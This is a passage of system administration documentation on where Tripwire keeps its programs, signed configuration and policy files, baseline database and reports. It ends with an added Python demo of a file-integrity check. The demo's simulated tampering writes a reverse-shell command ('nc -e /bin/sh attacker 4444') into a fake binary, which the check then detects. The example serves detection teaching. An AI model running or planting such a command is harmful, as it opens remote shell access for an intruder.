Before working with Tripwire, you should know where important files
for the application are located. Tripwire stores its files in a
variety of places depending on their role.
Within the /usr/sbin/ directory, you will find
the following programs:
tripwire
twadmin
twprint
Within the /etc/tripwire/ directory, you
will find the following files:
twinstall.sh — The initialization
script for Tripwire.
twcfg.txt — The sample
configuration file supplied by the Tripwire RPM.
tw.cfg — The signed configuration
file created by the twinstall.sh script.
twpol.txt — The sample policy
file supplied by the Tripwire RPM.
tw.pol — The signed policy file
created by the twinstall.sh script.
Key Files — The local and site keys created by the
twinstall.sh script which end with a
.key file extension.
After running the twinstall.sh installation
script, you will find the following files in the
/var/lib/tripwire/ directory:
The Tripwire Database — The database of your system's
files, which has a .twd file extension.
Tripwire Reports — The report/
directory is where Tripwire reports are stored.
The next section explains more about the roles these files play in the
Tripwire system.
19.10.1. Tripwire Components
The following describes in more detail the roles the files listed in the
previous section play in the Tripwire system.
/etc/tripwire/tw.cfg
This is the signed, binary-encoded Tripwire configuration file which
stores system-specific information, such as the location of
Tripwire data files. The twinstall.sh
installer script and twadmin command
generate this file using the information in the text version of
the configuration file,
/etc/tripwire/twcfg.txt. Note that signing is
not encryption: the site-key signature lets Tripwire reject a
tw.cfg that has been altered, but the contents are not secret
and twadmin can print them without a passphrase.
After running the installation script, the system
administrator can change parameters by editing
/etc/tripwire/twcfg.txt and regenerating a
signed copy of the tw.cfg file using the
twadmin command. See Section 19.9 Updating the Tripwire Configuration File for more information on how
to do this.
/etc/tripwire/tw.pol
The active Tripwire policy file is a signed, binary-encoded file
containing comments, rules, directives, and variables. This file
dictates the way Tripwire checks your system. Each rule in the
policy file specifies a system object to be monitored. Rules
also describe which changes to the object to report and which to
ignore.
System objects are the files and directories you wish to
monitor. Each object is identified by an object name. A property
refers to a single characteristic of an object that Tripwire
software can monitor. Directives control conditional processing
of sets of rules in a policy file. During installation, the
sample text policy file,
/etc/tripwire/twpol.txt, is used to
generate the active Tripwire policy file.
After running the installation script, the system
administrator can update the Tripwire policy file by editing
/etc/tripwire/twpol.txt and regenerating a
signed copy of the tw.pol file using the
twadmin command. Because the plain-text
/etc/tripwire/twpol.txt reveals exactly which objects
are monitored and which changes are ignored, keep it readable
only by root or remove it once the signed tw.pol has been
generated. See Section 19.8 Updating the Tripwire Policy File for more information on how
to do this.
/var/lib/tripwire/host_name.twd
When first initialized, Tripwire uses the signed policy file
rules to create this database file. The Tripwire database is a
baseline snapshot of the system in a known secure
state. Tripwire compares this baseline against the current
system to determine what changes have occurred. This comparison
is called an integrity check. The check is only as trustworthy
as the baseline: initialize the database before the system is
exposed to untrusted users or networks, because any tampering
already present when the database is created becomes part of
the "known secure" state. The database is signed with the local
key, so it cannot be silently rewritten without the local
passphrase.
When you perform an integrity check, Tripwire produces
report files in the
/var/lib/tripwire/report/ directory. The
report files summarize any file changes that violated the policy
file rules during the integrity check. Tripwire reports are
named using the following convention:
host_name-date_of_report-time_of_report.twr.
These reports detail the differences between the Tripwire
database and your actual system files.
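The following is an added illustration of the database and report roles just described; it is not Tripwire's own code. It models a policy as a map from a rule path to the properties to monitor, builds a baseline (the .twd role), tampers with a constructed directory tree, and produces a report of added, removed and modified objects (the .twr role). The property names, the hypothetical host name web01, the tree it builds and the YYYYMMDD-HHMMSS rendering of the report name are assumptions made for the example. On a real host the corresponding steps are tripwire --init, tripwire --check, and twprint --print-report --twrfile to read a report.

```python
"""Miniature Tripwire-style integrity check (added example, not Tripwire code)."""
import datetime
import hashlib
import os
import shutil
import stat
import tempfile

# Properties a rule can monitor. Tripwire tracks more (inode, links, owner,
# group, ctime, several hash types); this subset is enough to show the idea.
ALL_PROPS = frozenset({"perms", "size", "mtime", "sha256"})


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(path, props):
    """Record the requested properties of one system object."""
    st = os.lstat(path)
    rec = {}
    if "perms" in props:
        rec["perms"] = stat.S_IMODE(st.st_mode)
    if "size" in props:
        rec["size"] = st.st_size
    if "mtime" in props:
        rec["mtime"] = st.st_mtime_ns
    # Only regular files are hashed; a directory has no content to hash.
    if "sha256" in props and stat.S_ISREG(st.st_mode):
        rec["sha256"] = sha256_file(path)
    return rec


def objects_under(root):
    """Every object a recursive rule on `root` covers, root included."""
    yield root
    if os.path.isdir(root) and not os.path.islink(root):
        for dirpath, dirnames, filenames in os.walk(root):
            for name in dirnames + filenames:
                yield os.path.join(dirpath, name)


def init_database(policy):
    """Build the baseline (the .twd role). policy: {rule_path: set(props)}."""
    db = {}
    for root, props in policy.items():
        for path in objects_under(root):
            if os.path.lexists(path):
                db[path] = snapshot(path, props & ALL_PROPS)
    return db


def integrity_check(policy, db):
    """Compare the baseline against the live system (the .twr role)."""
    current = init_database(policy)
    added = sorted(set(current) - set(db))
    removed = sorted(set(db) - set(current))
    modified = {}
    for path in sorted(set(db) & set(current)):
        # Report only properties whose observed value differs from baseline.
        changed = {k: (v, current[path].get(k))
                   for k, v in db[path].items() if current[path].get(k) != v}
        if changed:
            modified[path] = changed
    return {"added": added, "removed": removed, "modified": modified}


def report_filename(hostname, when):
    """host_name-date_of_report-time_of_report.twr (date/time layout assumed)."""
    return f"{hostname}-{when.strftime('%Y%m%d')}-{when.strftime('%H%M%S')}.twr"


def demo():
    """Baseline a constructed tree, tamper with it, return the report with
    paths relative to the temporary root."""
    root = tempfile.mkdtemp()
    bin_dir = os.path.join(root, "bin")
    os.mkdir(bin_dir)
    os.chmod(bin_dir, 0o755)
    ls, cp = os.path.join(bin_dir, "ls"), os.path.join(bin_dir, "cp")
    for p in (ls, cp):
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho original\n")
        os.chmod(p, 0o755)
    policy = {bin_dir: ALL_PROPS}          # one recursive rule, all properties
    baseline = init_database(policy)

    # Simulated tampering: trojaned binary, removed tool, dropped file,
    # and a permission change on the directory itself.
    with open(ls, "w") as f:
        f.write("#!/bin/sh\necho original; nc -e /bin/sh attacker 4444\n")
    os.remove(cp)
    with open(os.path.join(bin_dir, "rootkit"), "w") as f:
        f.write("x")
    os.chmod(bin_dir, 0o777)

    raw = integrity_check(policy, baseline)
    shutil.rmtree(root)
    rel = lambda p: os.path.relpath(p, root)
    return {"added": [rel(p) for p in raw["added"]],
            "removed": [rel(p) for p in raw["removed"]],
            "modified": {rel(p): c for p, c in raw["modified"].items()},
            "file": report_filename("web01", datetime.datetime(2003, 2, 5, 14, 30, 0))}
```

Running demo() reports bin/rootkit as added, bin/cp as removed, bin/ls as modified in size and sha256, and bin as modified in perms. Note that a change of permissions alone is caught even though the file content hash is unchanged; that is why a policy names properties per rule rather than relying on a single hash.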